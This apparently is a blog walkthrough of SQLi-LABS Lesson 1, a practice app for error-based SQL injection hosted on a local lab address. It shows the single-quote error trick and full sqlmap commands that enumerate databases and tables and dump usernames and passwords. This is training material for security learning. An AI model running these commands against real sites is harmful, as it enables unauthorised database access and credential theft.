browser:iceweasel
os: kali linux
Web App: SQL-Labs
SQLi-LABS can be downloaded from
https://github.com/Audi-1/sqli-labs
There are several lessons and I will iterate through them all starting with less-1
lesson: number 1
Object: GET - Error based - Single quotes - String
This is simple stuff, simply visit
http://192.168.0.9/sqli-labs/Less-1/
we are met with an info message
Please input the ID as parameter with numeric value
we can achieve simply appending the following to the url
?id=1
so our full url will now look like
http://192.168.0.9/sqli-labs/Less-1/?id=1
a users username & password are returned to the screen changing ?id=1 to for example ?id=2 will display different credentials.
To get a simple error message produced on the screen simply append
' (a single quote) to the url
which returns the following error message
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
this bares all the hallmarks of a sql injection vulnerability, so therefore lets fire up sqlmap
sqlmap --url="http://192.168.0.9/sqli-labs/Less-1/?id=1" --dbs
this gives us the names of the databases
if your not sure which database to look in you'll have to poke around and see, our target is the security database, next we want to have a look at the available tables therefore our next command is
sqlmap --url="http://192.168.0.9/sqli-labs/Less-1/?id=1" -D security --tables
sqlmap --url="http://192.168.0.9/sqli-labs/Less-1/?id=1" -D security -T users --columns
sqlmap --url="http://192.168.0.9/sqli-labs/Less-1/?id=1" -D security -T users -C id,password,username --dump
we have sucessfully a exploited the sql injection vulnerability to retrieve all id's usernames and passwords from the mysql database
remember in the previous post sqlmap-database-takeover-tool-old-skool
we had to use the --data="" switch this was because the method was post and in this example the method is get therefore there was no need use --data=""
